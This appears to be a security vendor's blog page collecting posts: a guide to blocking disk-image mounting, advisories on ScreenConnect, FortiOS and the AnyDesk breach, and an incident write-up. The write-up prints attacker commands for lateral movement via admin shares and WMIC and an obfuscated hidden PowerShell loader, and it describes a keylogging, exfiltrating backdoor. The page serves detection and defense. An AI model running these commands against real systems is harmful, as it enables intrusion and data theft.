CMMC - IDS/IPS Alerts (Fortigate)
CMMC - VPN Connections (Fortigate)
FERPA - Firewall Configuration Change (Fortigate)
FERPA - IDS/IPS Alerts (Fortigate)
FERPA - VPN Connections (Fortigate)
FINRA - Firewall Configuration Change (Fortigate)
FINRA - IDS/IPS Alerts (Fortigate)
FINRA - VPN Connections (Fortigate)
Fortigate: Failed Admin Management Login from External IP
Fortigate: Successful Admin Management Login from External IP
Fortigate: System Configuration Changes
Fortigate: VPN - Successful Logins
GLBA - Firewall Configuration Change (Fortigate)
GLBA - IDS/IPS Alerts (Fortigate)
GLBA - VPN Connections (Fortigate)
HIPAA/HITECH - Firewall Configuration Change (Fortigate)
HIPAA/HITECH - IDS/IPS Alerts (Fortigate)
HIPAA/HITECH - VPN Connections (Fortigate)
ISO 27001 - Firewall Configuration Change (Fortigate)
ISO 27001 - VPN Connections (Fortigate)
ISO 27002 - Firewall Configuration Change (Fortigate)
ISO 27002 - IDS/IPS Alerts (Fortigate)
ISO 27002 - VPN Connections (Fortigate)
NIST - Fortigate Configuration Changes
NIST - VPN Connection (Fortigate)
PCI - Firewall Configuration Change (Fortigate)
PCI - IDS/IPS Alerts (Fortigate)
PCI - VPN Connections (Fortigate)
SOC2 - Firewall Configuration Change (Fortigate)
SOC2 - IDS/IPS Alerts (Fortigate)
SOC2 - VPN Connections (Fortigate)
Low
Welcome back to the Hedgehog Defense! In this post, we’re going to take a look at a common technique abused by threat actors to sneak past your typical mail filter and Windows defenses - automatic disk image mounting. Unintentionally, this is one of those, “Defenders hate this one easy trick!!!” deals. Fortunately, there are a couple quick and easy changes you can make to help defend yourself against this technique. I’ll be detailing how this feature is abused, why it works, and what you can do about it.
What is Automatic Disk Image Mounting?
Mostly everyone knows of the .iso file - these are basically disk images without the physical disk part. Administrators will typically write these to bootable media such as physical disks or USBs. However, disk images can also be mounted directly in Windows Explorer, allowing you to access contents directly without having to write to media. Native image mounting in Explorer was introduced with Windows 8 and has made it into every version since. This feature enables Windows to mount disk images such as ISO, IMG, VHD, and VHDX files with Explorer by default. You could do the same in versions before Windows 8, but third party applications were required. If there is one thing that attracts threat actors, it’s new features that were previously only possible through third party apps. A new built-in feature like this guarantees that people running Windows are now equipped with the tools by default and will be targeted.
How is it abused by threat actors “in the wild”?
So what’s the big deal? How could mounting a disk image possibly be leveraged by threat actors? The biggest advantages lie in the file type itself and not in its functionality. There are two primary reasons image files have been abused by threat actors:
- Image files have had an issue in the past with properly assigning “Mark of the Web” identifiers (more info in the next section)
- Not all mail filters will block image files by default or they may even be configured to allow them
Image file formats are unusual and uncommon vehicles for malware distribution. We all know how heavily scrutinized zip files are when it comes to emailing them around to other people or imagine trying to send an executable attachment. No matter who you send those to or how they have their mail filter configured, it’s unlikely those files will make it to the intended target recipient. Most mail filters will outright deny the email or strip the attachment. Furthermore, if those files do make it past the filter, they’ll probably be wiped out by an antivirus. Image files are not impervious to these defense tactics either, but due to their uncommon nature, some mail filters might not block them by default and more people may be willing to allow them since they don’t realize the danger. Users may be trained more to be on the lookout for the common malware file types and seeing an image file may lower their guard a little bit. It’s certainly not foolproof, but attackers will take any advantage they can get. Image files have also been observed being served via malicious advertising links.
Mark of the Web
Image files, like .ISO for example, previously had the ability to bypass a Windows security feature called “Mark of the Web” (MotW). This feature essentially marks files sourced from the internet with a special identifier. This identifier is used by Windows to handle files in a particular way. For example, if an Excel spreadsheet is downloaded from the internet, it will have the MotW identifier branded on it, essentially telling anyone who will listen that it originated from the internet. When a user tries to open this Excel file, Windows examines the MotW tag, acknowledges that it originated from the internet, and, as a result, processes the file through SmartScreen and opens the file in “protected view” . “Protected view” essentially puts the Excel file in a read-only mode where macros are disabled and no modifications can be made. When MotW is bypassed, Windows treats the file like a locally created file and does not handle the file in any special way. Threat actors like this because if they can get Windows to place some implicit trust in the file they’ve sent you, they can fly under the radar a little bit longer and get things to execute when they shouldn’t be able to.
Examining a local file, no Zone.Identifier data stream
Examining the zone.identifier stream on a file downloaded from the internet
Examining the zone.identifier stream on a file downloaded from the internet
Microsoft supposedly patched this particular MotW bypass strategy on November 8, 2022 (assigned CVE-2022-41091). While a fully patched version of Windows 10 does indeed mark the iso file as originating from the internet, I am unable to get the same report for the contents of the iso file once mounted. I’m not convinced this means these files aren’t tagged with the MotW zone.identifier, but just thought it was worth noting. Another reason to continue reading and take things a step further in terms of prevention.
Examining data streams of a file contained within the mounted ISO
Defense Against the Dark Arts (Image Mounting)
If we remember anything about the Hedgehog Defense tactic, it was that we should be focusing on a “defense in depth” strategy and layering our defenses whenever possible. In the case of attacks based on image files, we have several things going for us already - mail filters, antivirus, user training, and Microsoft patches, but why not just prevent users from being able to mount image files altogether? Sure, there may be a handful of users who need it as a legitimate business need, but I would bet that most users could be blocked and would be none the wiser while working through their day to day tasks. It’s following the practice of least privilege - if they don’t need to mount images, don’t let them. Let’s take a look at how we would go about doing that.
There are two primary methods to mounting a disk image in windows - double click and right-click context menu “mount” option. I will be going over a couple ways that you can do both, however, there are some methods to do just one or the other. This may be better for your situation/environment, but just be aware of what you are enabling and that it is providing the kind of coverage you want.
Method 1 (recommended): Disable all the things (via GPO)!
The first method I’m going to detail is the “all-in-one” and the one that I would recommend. This will disable right click mounting, double click, and will also disable mounting via powershell. You can also configure this method to be overrode by administrators if desired. These steps come directly from this write-up by Mubix "Rob" Fuller. This option won’t visibily remove the “mount” option from the right click context menu, but will effectively disable its functionality.
[video width="1118" height="632" mp4="https://www.blumira.com/wp-content/uploads/2024/03/no_mount.mp4" loop="true" autoplay="true"][/video]
Eventually results in an error message:
Auditing Existing Usage
If you don’t want to fully implement the “scream test” and would like to first audit your environment’s existing usage of Windows disk image mounting, create and deploy a GPO to audit plug and play events. This GPO option can be found under Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Detailed Tracking > Audit PNP Activity
Configuring and deploying this GPO will enable generation of Windows Event ID 6422. Of these events, you would specifically be looking for events related to SCSI\CdRomMsft____Virtual_DVD-ROM_ which would indicate the mounting of a disk image. Once you have that data, you can start getting a clear picture of who is using this feature on a regular basis and consider exempting them if there is a valid business need.
Configuring the GPO
To configure the GPO that is actually going to do all the blocking, follow these steps:
- Make a new GPO and browse to Computer Configuration > Administrative Templates > System > Device Installation > Device Installation Restrictions > Prevent installation of devices that match any of these device IDs
- Enable the GPO and check the box for “Also apply to matching devices that are already installed”.
- Click on the “Show…” button and then add the device ID SCSI\CdRomMsft____Virtual_DVD-ROM_
- Bonus - If you want Administrators to be able to override this setting, make sure you also enable the separate setting, “Allow administrators to override Device Installation Restriction policies”
- That’s it! Now assign this GPO out to whatever OU you want or deploy domain wide if you want everyone locked down. Remember that this is a Computer Configuration based GPO, so it must be assigned to a Computer OU.
Method 2: Change the default app for Image files (via GPO)
This next method provides slightly less coverage, but that may be more ideal for some environments. For example, this will still allow for right click mounting as well as mounting via powershell. This method will technically remove the right-click “mount” context menu option, but you can still hit “open with explorer” and it will mount. It’s accomplished by changing the default app associated with image file extensions, in this case - ISO, IMG, VHD, and VHDX. If this looks familiar, it’s because it’s the same technique I detailed in the last Hedgehog Defense. I won’t go super into detail since my previous blog post details all of that, but you would essentially just assign these files types - ISO, VHD, VHDX, and IMG files to open with something innocuous like notepad (...with these file association strategies, maybe we should refer to it as “nopepad”?). It also must be noted that users can manually set the default app back to explorer and bypass this method of prevention.
[video width="1736" height="912" mp4="https://www.blumira.com/wp-content/uploads/2024/03/notepad_mount.mp4"][/video]
Method 3: Remove “Mount” Context Menu Item and Disable Double Click Mount via Registry
The third and last method I will be discussing is accomplished with a simple registry edit. This method will completely remove the right click “mount” context menu option and disable double click mounting, but will still allow for mounting via PowerShell.
- Open registry editor and browse to HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount
- Right click and create new Key (REG_SZ) named ProgrammaticAccessOnly
- To cover VHD and VHDX, add the same key to HKEY_CLASSES_ROOT\Windows.VhdFile\shell\mount
- That’s it, a reboot isn’t even needed
Now, when you right click, the “Mount” option is missing and double clicking results in opening the file with the disk burner (which also disables the attack flow).
[video width="1122" height="632" mp4="https://www.blumira.com/wp-content/uploads/2024/03/reg_no_mount.mp4" loop="true" autoplay="true"][/video]
Obviously, if you’re deploying this en masse, you’ll have to find a way to automate this process, but many RMMs have this ability. You can also deploy registry changes like this via GPO. That is out of scope of this article, but there are plenty of guides online that can help with automating and deploying registry changes.
Proof of Concept
Now let's take a look at these things in action in a simulated attack. In this example, our poor victim, Hank, received an email asking him to review a file on his company's file share. Unfortunately, the link sent to him is spoofed to look like it's local to his network, but it's really reaching out externally to download the iso. Upon downloading the iso, Hank clicks on it to open it (as most people would do) and it mounts the iso. From there, he double clicks the "Document" shortcut which runs the payload and establishes a connection with the attacker.
[video width="2426" height="1052" mp4="https://www.blumira.com/wp-content/uploads/2024/03/PoC_Before.mp4"][/video]
Now that we know what a successful attack looks like, let's see what happens if Method 1 was deployed.
[video width="1280" height="720" mp4="https://www.blumira.com/wp-content/uploads/2024/03/PoC_after_edit.mp4"][/video]
In this situation, no matter how Hank tries to mount the iso file, it is unsuccessful. As a result, he is unable to access the contents and trigger the payload. No callback for the attacker this time!
How Blumira Can Help!
Now that you've learned how to stop this kind of attack - learn how to detect it! Blumira has a dedicated detection titled, "Potentially Malicious ISO file (LNK)" that will notify you should this kind of activity occur in your environment.
Learn more about how Blumira supports your cybersecurity strategy by trying out our free Blumira SIEM.
Medium
Update – 5:45pm 2.21.24 – Detections have been built and tested and are in the process of being deployed to all of our customers. There are three new detections overall and all three are enabled by default:
- ConnectWise ScreenConnect Path Traversal Exploitation CVE-2024-1708
- Identifies IOC artifacts in C:\Program Files (x86)\ScreenConnect\App_Extensions\
- utilizes Windows EID 4663, Sysmon EID 11, or Blumira Agent
- ConnectWise ScreenConnect SetupWizard User Database Modification CVE-2024-1709
- Identifies IOC artifacts in C:\Windows\Temp\ScreenConnect
- utilizes Windows EID 4663, Sysmon EID 11, or Blumira Agent
- ConnectWise ScreenConnect SetupWizard Authentication Bypass CVE-2024-1709
- Identifies web requests made with to SetupWizard.aspx trailing path
- utilizes Windows IIS logs (via nxlog or Blumira Agent)
There is nothing you need to do to enable these. These are rolling out to all of our customers now and will automatically begin watching for suspicious events.
Update – 1:16pm 2.21.24 – Through further research and review, it seems Sysmon should be able to catch some of this activity as well. Both previously mentioned 4663 events should generate sysmon event 11 (file create) events. If you used Poshim to deploy Blumira or use our Blumira Agent, you are already covered. While not recommended, you can also manually deploy and configure sysmon.
Update – 12:12pm 2.21.24 – Huntress has released a really great article getting into the details on these vulnerabilities and what to look for when exploited. Blumira is working quickly to build, test, and deploy these detections to our customers. Based off of Huntress’ research, the best indicators are based off of windows event ID 4663 and web server iis logs. If you don’t have these configured for your ScreenConnect web server, refer to these articles to help you do so:
- Event ID 4663 – How To Detect File Changes in Windows Server
- After enabling 4663, you must set up a SACL on the ScreenConnect Directory at C:\Windows\Temp\ScreenConnect and C:\Program Files (x86)\ScreenConnect
- IIS Logging – Integrating with Microsoft Windows Internet Information Services
Update – 4:51pm 2.20.24 – PoC (Proof of Concept) exploit development is showing results with several researchers demonstrating exploitation in test environments. Successful exploitation results in a new ScreenConnect admin account being created. Monitoring for newly created users and login activity for your ScreenConnect instance is a good first step. Again, due to the nature of this vulnerability, no previous authentication is required, with Horizon3 stating the vulnerability to be “extremely trivial” to exploit. Reference – Horizon3 and Huntress
What Happened?
On February 19th, 2024, the IT Management Software company, ConnectWise, announced the identification of two vulnerabilities in their remote access tool, ScreenConnect. These vulnerabilities directly impact and target on-prem or self-hosted ScreenConnect Web Servers running version 23.9.7 and prior.
- CWE-288 Authentication bypass using an alternate path or channel
- CWE-22 Improper limitation of a pathname to a restricted directory (“path traversal”)
Due to the nature of these vulnerabilities, they have been assigned a critical severity by ConnectWise, defined as, “Vulnerabilities that could allow the ability to execute remote code or directly impact confidential data or critical systems.”
In regards to remediation and patching priority, ConnectWise has assigned this as high priority, “Vulnerabilities that are either being targeted or have higher risk of being targeted by exploits in the wild. Recommend installing updates as emergency changes or as soon as possible (e.g., within days)”.
These vulnerabilities were reported to ConnectWise on February 13th by an unnamed security researcher via the ConnectWise Trust Center. ConnectWise has stated that, “There is no evidence that these vulnerabilities have been exploited in the wild, but immediate action must be taken by on-premise partners to address these identified security risks.”
How Bad is This?
Vulnerabilities that lead to remote code execution are some of the most critical and severe issues out there and could lead to complete control over a targeted server. To make matters worse, ScreenConnect servers affected by these vulnerabilities are likely going to be public facing, making them easy targets for mass scans and exploitation.
What Should I Do?
Remediation
Cloud – For organizations using a managed ScreenConnect Cloud instance, no remediation action is necessary. “ScreenConnect servers hosted in ‘screenconnect.com’ cloud or ‘hostedrmm.com’ have been updated to remediate the issue.”
On-Premises/Self-hosted – Update ConnectWise ScreenConnect servers to version 23.9.8 immediately.
Investigation/Detection
Unfortunately, details are light at the moment and no indicators of attack have been publicly released. There has been no evidence of these vulnerabilities being exploited in the wild, but that is likely due to the age of this announcement and, as time goes on, will undoubtedly change as threat actors begin acquiring targets and weaponizing these vulnerabilities.
How Blumira Can Help
Blumira continues to actively monitor this issue, and look for ways that we can detect any stage of exploitation of these vulnerabilities. If Blumira gains the ability to detect the attacks using these vulnerabilities, it is most likely going to be via our endpoint agent. If you are running an on-prem ScreenConnect server, and you are already using a Blumira edition that supports endpoint agents, please ensure that you have the endpoint agent installed on your ScreenConnect server.
If you are an MSP and not already using Blumira, please submit a request for a “free for internal use” NFR account.
Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Medium
What Happened
On Thursday, Fortinet announced two new, critical vulnerabilities in devices running FortiOS. Successful exploitation of either of these announced vulnerabilities leads to remote code execution.
If critical vulnerabilities weren’t bad enough, Fortinet has evidence of possible exploitation “in the wild” of CVE-2024-21762. Considering the nature of this vulnerability in that it affects typically public-facing sslvpn services, malicious scans and exploitation attempts will likely begin en masse.
Impacted Versions, Available Patches, and Workarounds
Impacted FortiOS versions for CVE-2024-21762 include 6.0, 6.2, 6.4, 7.0, 7.2 and 7.4. Patches are available for FortiOS versions 6.2 through 7.4. FortiOS version 6.0 has reached EoL and will not be receiving a patch. For those of you still running 6.0, it is recommended to migrate to a fixed release or completely disable the SSL VPN service (as recommended by Fortinet).
Impacted FortiOS versions for CVE-2024-23113 include 7.0, 7.2, 7.3 with patches available for each version.
What That Means
Both of the announced vulnerabilities result in remote code execution. Exploits that result in RCE are among the highest rated security issues and practically give attackers full control over the exploited device. They can create users, make configuration changes, or even pivot to simply deploying a second stage malware attack. In fact, it was just recently reported by The Netherlands National Cyber Security Center (NCSC) that threat actors were abusing an older Fortigate vulnerability (CVE-2022-42475) to deploy a remote access trojan dubbed COATHANGER. While there is no evidence that these new vulnerabilities have been used to deploy this malware, it is certainly possible.
Organizations running Fortinet devices should begin reviewing patch levels of their devices and start planning to update as soon as possible. As has been noted by Fortinet, CVE-2024-21762 shows evidence of being exploited in the wild. Considering too that checking for and triggering this exploit can be completed with a simple http request, it is likely we’ll see this being widely and frequently abused. Luckily, no publicly available exploits have been uncovered yet, so that creates a *small* barrier to exploitation, but that’s almost like saying a single piece of scotch tape will keep a cracked dam from busting wide open.
CVE-2024-23113 is getting easily outshone by CVE-2024-21762, but should also not be taken lightly. Details are light at this time, but I think 23113 is getting the backseat here a bit is likely due to several factors such as no active exploitation, the exploit seems more geared towards internal attacks, and just the sheer amount of organizations running SSLVPN likely outnumbers those affected by the bug with fgfmd. However, the fact that this vulnerability could also result in remote code execution makes it just as important to patch as 21762.
What Should I Do
Patches should be applied as soon as possible in this instance. If patching is not an option, then consider one of the approved workarounds as a temporary solution until patching can be completed. If you are running unsupported versions, it’s time to bite the bullet and make the upgrade to a newer version.
How Would I Know
Details are light at this time, so it’s difficult to identify active attacks or compromised devices. With details being so light, we can only really recommend the basics:
- Monitor for suspicious incoming traffic, specifically HTTP requests
- Monitor changes to FortiOS configurations
- New user creations or unusual activity from existing accounts
- Unusual administrative commands
- Unusual or suspicious User/Administrator logins – unusual location, login without MFA (if enabled), etc
Blumira can help!
We have several existing detections as well as global reports that can be used to track everything going on with your Fortinet devices. We will also continue to monitor the situation and deploy additional detections and reports as needed.
Detections:
- Fortigate Firmware Available
- Fortigate: Successful Admin Login from External IP Address
- Fortigate: SSL-VPN pre-auth RCE CVE-2022-42475
- Fortigate: Authentication Bypass CVE-2022-40684
- Fortigate: Failed Admin Login from External IP Address
- Fortigate: Configuration Change
- Fortigate SSLVPN Anomalous Access Attempts
Global Reports:
- Fortigate: Failed Admin Management Login from External IP
- Fortigate: Successful Admin Management Login from External IP
- Fortigate: System Configuration changes
- Fortigate: VPN – successful logins
Medium
AnyDesk Production Systems Compromised
Running AnyDesk? Time to start patching. As if the minefield that system administrators have to walk on a daily basis isn’t bad enough, AnyDesk confirms that they have had a breach of their production systems. As of time of writing, no timeline has been officially released. It is suspected that unauthorized access started early to mid January 2024 and concluded January 29th, 2024.
During that time, threat actors compromised systems and ran away with source code and signing certificates used for the AnyDesk client. No official statements have been made to specific details behind the event, including initial access. With Crowdstrike assisting in IR and remediation efforts, this will likely be made public at some point.
AnyDesk Responds
AnyDesk has made it clear that ransomware was not the objective of this attack. As of February 4th, systems have been secured and are safe to use. New signing certificates have been issued and applied to both the custom client and general client as of versions 7.0.15 and 8.0.8, respectively. Older versions of the software will continue to run with the compromised certificates. These will likely be revoked by AnyDesk in the future. Antivirus may also soon start blocking or quarantining these versions, so make sure you get updated as soon as possible.
AnyDesk has confirmed that they have no indication that user endpoints were affected or compromised due to this event. Furthermore, there has been no evidence to indicate that user credentials have been compromised. Out of an abundance of caution, AnyDesk has revoked credentials for users of the customer portal, “my.anydesk.com II”. Customers who use “my.anydesk.com I” are completely uninvolved due to the attack being pinpointed to specific relay servers in Europe that are only utilized and accessible by “my.anydesk.com II”. Again, AnyDesk stated no evidence of credential theft has taken place, however, to even be considered possibly vulnerable to credential theft in this incident, you would’ve had to:
- Authenticate to an affected relay server, used by “my.anydesk.com II”
- This relay server you’re authenticating to is in Europe
- The relay server is inside the location zone of the affected servers (Spain and Portugal)
- You manually entered credentials into the client during the time of the incident (early, mid-January to January 29th).
It’s not just one of these conditions that has to be true, but ALL have to be true. This is basically AnyDesk saying, “If credentials were compromised, this is how it would have to happen”. This is also an ongoing investigation, so it is likely we will get further confirmation of compromised credentials, if there are any. Either way, we’re all so used to resetting passwords at this point that it may just be easier to do a quick reset and move onto the next fire that requires your attention.
“Is it safe to run AnyDesk, even after patching?”
The true consequences of this attack remain to be seen. The details are still coming out and we will likely not have a full disclosure of the event anytime soon. The answer to this question then comes down to your own organizational risk appetite. That is, what level of risk are you willing to accept while waiting for additional information to surface? That answer is wildly different between organizations and no answer is wrong (that is, unless you’re accepting any and all risk, which is a…questionable strategy). Let’s attempt to understand the implications of having source code and signing certificates stolen – what can threat actors do with these? It’s great that AnyDesk has worked to secure their infrastructure and remove the bad guys, but how could these things be used maliciously now that they’re out in the wild?
Risks associated with stolen source code:
- Analysis of source code may reveal vulnerabilities or weaknesses that can be exploited in future attacks.
- Contributes to the research and development of possible 0-day exploits against AnyDesk software.
- Manipulated and compiled into malicious versions of the software, to be masqueraded as legitimate versions.
- May lead to additional, targeted attacks against AnyDesk and their customers.
Risks associated with stolen signing certificates:
- Threat actors can sign any of their own malicious software with these certificates, making it appear legitimate and pass basic security checks.
- Can make modifications to the existing software and then re-sign the software, making it appear legitimate in form and function, but has been injected with malicious code.
There are additional checks and balances that hopefully mitigate some of these risks. For example, many antivirus vendors are already marking the stolen certificate as malicious and generating alerts. These risks are also just examples and certainly not guaranteed to happen, nor is this an exhaustive list of all the risks. Stick to the basics of understanding where AnyDesk is used in your environment and properly patching and managing it and you should be safe. On the bright side, you may actually be able to use this event to get some stubborn users off of AnyDesk…not that I have any personal experience with this or anything.
Incident Highlights
What Happened?
- Cyberattack on AnyDesk. Threat Actors gained access to production systems.
- No specific timeline given yet, but suspected to be early to mid-January 2024 to January 29th, 2024.
- Incident Response and Remediation began January 29th, 2024 and concluded on February 4th, 2024.
- Source Code and signing certificates stolen.
- Not a ransomware attack.
- No evidence of end user devices being affected or compromised.
- No evidence of customer credentials being stolen or compromised.
- No evidence of source code being manipulated in any way.
- No evidence of on-premise hosted solutions being affected.
What has AnyDesk done?
- Partnered with Crowdstrike for IR efforts.
- Updated the custom client and general client with new certificates.
- Forced password resets for users of the customer portal, “my.anydesk.com II”.
Actions to Take
- If you have a customer portal account with “my.anydesk.com”, complete a login and reset your password if prompted. Enable 2FA if available.
- If you are not prompted, you are likely not affected, but may want to reset your password anyways.
- If this password is reused elsewhere, make sure you reset it everywhere.
- Update to the latest AnyDesk client.
- For organizations using the custom AnyDesk client, update to version 7.0.15.
- For organizations using the generally available AnyDesk client, update to version 8.0.8.
- Scan your environment for the installation and execution of AnyDesk software. Even if you don’t think it’s being used, it is often bundled with many third party software for support and maintenance purposes. It is also not uncommon for users to install this software on their own, unbeknownst to administrators.
- If you identify installations from bundled software, check to see if the bundled software has any updates.
- If you identify standalone installations, update as needed or consider removing if they are not approved or no longer needed.
- If you are concerned about unauthorized access, you can review AnyDesk logs on each endpoint or the web console to identify if any unauthorized access was attempted or permitted in the last 30 days at a minimum.
Need help finding AnyDesk in your environment? Blumira can help!
In response to this incident, we have made a new global report available to all of our customers. Titled, “AnyDesk Process per Endpoint”, this report can help you identify if AnyDesk is running in your environment. From there, you can start planning out pushing updates or even just uninstall it if it’s not approved for use in your network. Additionally, if you’d like to be alerted to the use of AnyDesk in your environment, we have a detection titled, “Remote Access Tool: AnyDesk” that will trigger anytime AnyDesk is run on monitored endpoints. This is useful if you want an ongoing scan for AnyDesk use in your environment rather than performing manual audits.
For further details regarding the event, see AnyDesk’s official communication links below:
Low
Executive Summary
On November 20, 2023, Blumira produced three findings that led to a Security Incident investigation regarding remote code being run on two separate XYZ Company hosts. The initial workstation host {hostname1} downloaded a malicious executable that was masked as “Advanced IP Scanner.” This file then began running automated Batch script commands and copying the behavior over to the server {DomainController2}. Via the attacker, the malicious application also began setting up a Command & Control session with an IP address hosted at CloudFlare.
Incident Walkthrough
Note: All IP addresses, hostnames, and usernames have been changed to protect customer data.
2023-11-20
Time: 18:57 UTC
Mitre Tactic & Technique: Discovery, T1018 – Remote System Discovery
Activity #1: – TOMSMITH mistakenly downloaded malicious software on hostname1. This malicious software masked itself as Advanced IP Scanner in Google search results, and resulted in the user navigating to a fake version of this software hosted in a Cloudflare instance. The logs show the installation of this program onto hostname1 as well. Important artifacts created around this time are:
C:\ProgramData\Microsoft\NodejsToolsVsix\CG6oDkyFHl3R.tC:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t
Time: 18:59 UTC
Activity #2: A Blumira finding for Advanced IP Scanner was generated. While this wasn’t the legitimate version of Advanced IP Scanner, we do still see the value in detecting an early stage reconnaissance, as correlated activity could be early warning signs of an attack.
Time: 19:06 UTC
Mitre Tactic & Technique: Discovery, T1016 – System Network Configuration Discovery
Activity #3: Administrator runs several commands to gather information about the AD domain.
"C:\WINDOWS\system32\nslookup.exe" internaldomain.localC:\WINDOWS\system32\systeminfo.exe"
Time: 19:06 UTC
Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #4: When the Advanced_IP_Scanner_2.5.4594.1.exe is run we can see the LOLBAS mentioned in an attack here in action. The following two commands directly afterwards show us building the DLL, and then calling the script.
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\TOMSMITH\AppData\Local\Temp\RESA392.tmp" "C:\Users\TOMSMITH\AppData\Local\Temp\vbcEF74F3B3EC042EBBFF08FC71F3636EB.TMP"
Time: 19:07 UTC
Mitre Tactic & Technique: Collection, T1074.002 – Data Staged: Remote Data Staging
Activity #5: Administrator runs the command below to copy a malicious batch file to the newly discovered domain controller.
"C:\WINDOWS\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y
Time: 19:08 UTC
Mitre Tactic & Technique: Execution, T1047 – Windows Management Instrumentation
Activity #6: From hostname1 the attacker uses WMI for remote command execution to run the newly copied code on the domain controller.
"C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create "cmd.exe /cC:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"
Time: 19:08 UTC
Activity #7: A Blumira finding for WMI Remote Code Execution was generated for the previous command.
Time: 19:09 UTC on DomainController2
Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #8: Now that the attacker had an available remote shell into the domain controller, they were able to run commands on the DomainController2 host. DomainController2 then runs following powershell script.
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden -command "Set-Item Variable:LeX 'Net.WebClient';Set-Item Variable:/8i'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t';ls _-*;SI Variable:TL(.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name).Invoke('N*-O*')(GV LeX -Valu));Set-Item Variable:\h ((((Get-Variable TL).Value|GM)|Where-Object{$_.Name-clike'*wn*g'}).Name);$ExecutionContext.(($ExecutionContext|GM)[6].Name)|ForEach-Object{(Get-Variable_).Value.(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'In*'}).Name).Invoke((Get-Variable TL).Value.((Get-ChildItemVariable:/h).Value).Invoke((Variable 8i -ValueOnl)))}"
To break this down a little:
1. This part runs PowerShell with a hidden window, which is often a tactic used by malicious scripts to hide their activity from the user:
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden
2. This creates a new variable named LeX and sets it to Net.WebClient, which is a .NET class used for making web requests.
Set-Item Variable:LeX 'Net.WebClient'
3. This sets another variable, /8i, to a specific file path.
Set-Item Variable:/8i 'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t'
4. This seems to list items in the current directory with names starting with an underscore.
ls _-*
5. The next part of the script uses complex PowerShell syntax to dynamically create and modify variables and their values. This includes accessing the execution context, modifying variable properties, and invoking methods. The script appears to be using reflection and other advanced techniques to dynamically invoke methods and manipulate objects. This is a common tactic in malicious scripts to evade detection and analysis.
Time: 19:10 UTC
Mitre Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #9: We then see a batch script file running from that same directory.
"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe" abnormal c:\programdata\Administrator cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat
Time: 19:10 UTC
Activity #10: A Blumira finding for Batch Script Execution was generated. We do not alert on all batch script executions, just as we don’t alert on all programs being run. Someone remotely called the command line first from an unusual location to run this batch script.
We were also given a copy of both the CG6oDkyFHl3R.t and LogConverter.bat from the customer. The .t file was a C# application and here is a breakdown of its key functionalities:
- Namespace and Classes: The application is contained within the namespace iVyisyGgNYMCvKq.
- KuSyEkRq Class:
- This class has three properties: UUID, ID, and Data. These seem to be related to identifying and storing data.
- TrustAllCertsPolicy Class:
- Implements the ICertificatePolicy interface and overrides the CheckValidationResult method to always return true. This trusts all SSL certificates.
- XwOWxCEB Class:
- Contains various DllImport statements for interacting with user32.dll and kernel32.dll.
- Defines several static variables and methods for window management, key logging, and sending data to a remote server.
- arXOPGDNf Class:
- Defines methods for encrypting and decrypting byte arrays.
- KuSyEkRq Class:
- Methods
- Main Method:
- Calls ShowWindow to hide the console window.
- Invokes the mDrSGqJS method with specific parameters.
- mDrSGqJS Method:
- Configures SSL certificate validation callback to trust all certificates.
- Sets up parameters such as server URL, a unique identifier (cuzGRbghiiDuB), and a byte array (cRcQUEGZXJWrUs).
- Initiates a loop to communicate with the remote server, handling various commands like “delay,” “exit,” and user input.
- YJUBBebXRoNQCY Method:
- Retrieves the active window’s title.
- pmavtYHsUqft Method:
- Executes PowerShell scripts and captures the output.
- mTEBtfK Method:
- Sends data to a remote server using HTTP POST requests.
- Main Method:
An attacker designed this obfuscated program for remote control and data exfiltration. The program hides its console window, communicates with a server over HTTPS, and can execute PowerShell commands on the local machine, sending the encrypted results back to the server.
Time: 22:16 UTC
Activity #11: The malicious software masked itself as Advanced IP Scanner on DomainController2 and we updated the previously created finding with new information.
Time: 22:53 UTC
Activity #12: Customer contacts our support team.
Time: 23:37 UTC
Activity #13: Support team begins investigation.
2023-11-20
Time: 01:54 UTC
Activity #14: The customer manually isolates the hosts using Blumira Agent.
Time: 14:13 UTC
Activity #15: After consulting with the customer and confirming this was an attack and not something expected, a member of the Blumira team starts the process of submitting a report for the malicious Cloudflare instance via Cloudflare’s abuse page.
Time: 15:27 UTC
Activity #16: 2 files were found on hostname3 as part of an automated backup process for the Administrator profile. SentinelOne took action and blocked the file LogConverter.bat from executing.
Detection & Defense Recommendations
In this specific instance there are several different defensive recommendations from the Blumira team.
- Most users should not have local administrator permissions. If you, your team, or other everyday endpoint users are running email clients, browsers, and other applications as a local or domain administrator you are opening the door to many automated attacks. Privilege escalation from your account to another device or process becomes exceedingly easier.
- Local administrator passwords should be complex and different per workstation. If an attacker is able to discover a single local admin password, that shouldn’t mean they are able to plug that into a script or pass the hash and have it work on every endpoint in an environment. You can use solutions like Windows LAPS to generate unique passwords locally. Windows now natively integrates LAPS, eliminating the need for external installations and also working in conjunction with Entra ID.
